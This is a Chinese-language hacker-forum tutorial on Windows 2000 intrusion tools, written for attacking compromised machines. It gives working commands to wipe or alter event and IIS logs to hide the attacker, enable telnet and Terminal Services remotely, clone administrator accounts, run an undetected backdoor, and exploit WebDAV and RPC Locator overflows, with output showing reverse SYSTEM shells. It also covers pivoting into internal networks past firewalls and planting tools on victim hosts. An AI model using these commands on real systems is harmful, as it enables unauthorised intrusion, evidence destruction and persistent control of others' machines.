简单黑客工具的使用

积分值

我通过一段安全技术的学习,在学习中使用比较多的工具,今天,我把自己一些使用的经验总结一些,把一些比较常用的黑客工具的使用方法写出来,希望给大家一些帮助! (有任何问题请在论坛中提,或者跟帖)

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

1.小榕的elsave清除日志的使用:
先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""
清除目标系统的应用程序日志:
elsave -s \\ip -l "application" -C
清除目标系统的系统日志:
elsave -s \\ip -l "system"" -C
清除目标系统的安全日志:
elsave -s \\ip -l "security" -C

2.windows2000日志的清除:
www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.
win2000中的其他一些日志:
安全日志:%winsystem%\system32\config\Secevent.evt
应用程序日志:%winsystem%\system32\config\AppEvent.evt
系统日志:%winsystem%\system32\config\SysEvent.evt
IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志
IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志
Scheduler服务日志:%winsystem%\schedlgu.txt
注册表所在项目:
[HKLM]\system\CurrentControlSet\Services\Eventlog
Schedluler服务注册表所在项目:
[HKLM]\SOFTWARE\Microsoft\SchedulingAgent
如果日志被从新定位,路径在注册表里面有记录.
清除日志
清除日志必须先停掉相关的服务后才能进行:
www和ftp日志必须想停w3svc: net stop w3svc
然后就可在相关日志目录下面把你想要删除的日志删除.
Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"
系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.
也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:
cleaniislog [logfile]|[.] [cleanIP]|.
说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录
举例:cleaniislog . 127.0.0.1
A.可以清除指定的的IP连接记录，保留其他IP记录。
B.当清除成功后，CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog | |
: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件注意：处理所有日志文件需要很长的时间）。
: 指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不推荐这样做）。
CleanIISLog只能在本地运行，而且必须具有Administrators权限。


3.opentelnet 打开远程登陆服务的工具使用方法:
前提是必须具有目标系统的管理员权限和开了IPC$,命令如下:
opentelnet \\ip username password NTLMauthor Telnetport
目标IP 用户名 密码 验证方式 端口
验证方式有:0:代表不使用NTLM验证 1:代表先尝试使用NTLM验证,失败后用密码验证 2:只使用NTLM验证
执行后使用Telnet ip port 或者nc -vv ip port 就可以登陆目标机器了.

ResumeTelnet.exe，是用来恢复Telnet配置的，并关闭Telnet服务器，它的用法：
ResumeTelnet.exe \\ip

在取消NTLM验证的方法还有,就是使用小容的工具:NTLM,把这个工具上传到目标系统然后使用AT命令激活就可以了,也可以使用ncx上传到目标机器,AT执行后Telnet ip 99 也进入了机器,就可以启动Telnet了.

4.克隆帐号的工具:ca
只要拥有目标系统的管理员权限得帐号和密码就可以进行克隆了.
方法:ca \\ip administrator password IUSR_name password
说明: 管理员帐号 密码 系统已经存在的较低权限的用户 密码
cca:检查克隆结果的工具.
cca \\ip user password
user:被克隆的帐号
password:密码

5.手工开启windows2000的终端服务:
进入目标系统后,在命令提示符下面输入下面的内容: (假设系统在C:\winnt下面)
echo [Components] > c:\xhl
echo TSEnable = on >> c:\xhl
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\xhl /q
(可以在加上参数/r,可以抑制重新启动,不加安装完后就重启)

6.最小的后门Tini的使用:
在目标系统运行后即可以用Telnet \\ip 7777 端口进行连接,Tini没有木马的特性而且是利用系统本身的服务来运行自己,所以不会被查杀.

7.webdav溢出:
##英文版##
需要工具:

英文溢出:
此程序对远程主机进行溢出攻击,溢出成功后就能在本地监听口上获取远程主机的反向
连接,获取system权限的cmdshell.
NC.EXE (这个不用我告诉你在哪下吧!)
还有webdavscan扫描器(黑白有下的)!
1.先用webdavscan扫到有种洞洞的机子(好多的但成功率不高!)
2.然后nc -L -vv -p 666(开启监听666端口)
3.用编译好的溢出程序wb.exe 666 0-3都试试
如果运气好的话再用nc连接666就可以直接进入对方主机的winnt目录了

##中文版##
用isno写的webdavx3溢出有此漏洞的机器后,用nc连接,就可以获得system权限.
例:
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
......
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... （IIS在这里重起了，等一会）
try offset: -4 （程序运行到这里停顿下来了，如果停顿时间比较长都没有反应，就按Ctrl+C，然后连上目标的7788端口去）
^C
C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

8.RPC Locator服务远程溢出:
微软RPC Locator服务远程溢出可以用一个溢出程序:LocatorHack.
使用方法:

A. 在本机用nc监听一端口

nc -vv -l -p 99

B. 进行远程溢出攻击

locatorhack -h 127.0.0.1 -v 2 -l 2 -s 3 -r 10.24.9.100 -p 99
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

connect socket....
connect smb...
open namedpipe...
bind rpc...
call rpc...
Overflowed, 127.0.0.1:99
good luck :)

C. 在本机监听口将获取一个来自被攻击主机的system权限cmdshell.

nc -vv -l -p 99
listening on [any] 99 ...
connect from w8w6si3h7nrgnmw [10.24.9.100] 2445

www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

9.端口重定向工具:fpipe
可以将本地的某个端口定向到其他主机的端口,可以绕开防火墙而入侵内网.是入侵内网的必备工具!
fpope的语法:fpipe [-hv?] [-brs ] ip
参数说明:
-c:连接的最大数目,默认是32
-l:要监听的TCP端口号
-r:要定向到的主机端口号
-s:从那个端口发出重定向信息
-v:显示详细过程
例子:
fpipe -l 80 -s 90 -r 80 -202.98.177.162
解释:将到本机80端口的连接通过本机的90端口转向连接到202.98.177.162这个主机的80端口.试验一下,我们在浏览器里面输入127.0.0.1,却会发现我们的浏览器里面出现了202.98.177.162这个主机的内容,也就是说我们把到我们主机的信息转发到了202.98.177.162这个主机上.执行后,在本机的命令提示符下面将会一有相关的资料出现: In: 127.0.0.1:2029------>127.0.0.1:80
Out: 192.168.0.2 -------> 202.98.177.162:80
从上面可以看出数据的经过方向:从本机(192.168.0.2)的80端口转向到了202.98.177.162的80端口.
实战:
在你的肉鸡上面执行fpipe:
fpipe -l 81 -s -91 -r 23 192.168.0.15
解释:将本机(肉鸡)81端口的数据通过本机(肉鸡)的91端口转向到内网中192.168.0.15的23端口.如果你从自己的主机telnet到肉鸡的ip,那么它就会定向到它内网中192.168.0.15的23端口上,事项了绕开防火墙入侵内网的功能.

10.ftp工具之X-ftpd
x-ftpd是简易的命令行方式FTP服务器.如果你再溢出,或者别的方法获得了肉鸡系统的管理权限,进入了肉鸡系统,那么如果它没有开诸如IPC$之类的,那么你要拷贝工具就比较困难了,但是如果你可以通过ftp从远程系统下载需要的工具.X-ftpd 这么个工具就是把你自己的主机变成一个简单的ftp服务器,然后可以让肉鸡从你那里下载需要的工具了.
运行参数说明：

xftpd [用户名] [登录口令]

[用户名]和[登录口令]为可选参数，默认用户名和登录口令为空

示例：xftp 21 20 c: ftp ftp
xftp 2000 2001 d:\temp
xftp 0 0 ""
然后从肉鸡登陆本机的 ftp xx.xx.xx.xx 23
ftp 本机ip 端口
就可以上传你需要的各类工具了,默认下载后的文件在肉鸡系统所在分区的根目录下面,如果肉鸡的系统在:c:\winnt,那么下载后的工具就在c:\下面,所以如果你把工具用完了的话一定要删除或者把它们拷贝到%systemroot%\winnt\system32下面,可以防止发现,方便下次再使用

昨夜心醉

好东西大家都来顶顶。。。。。。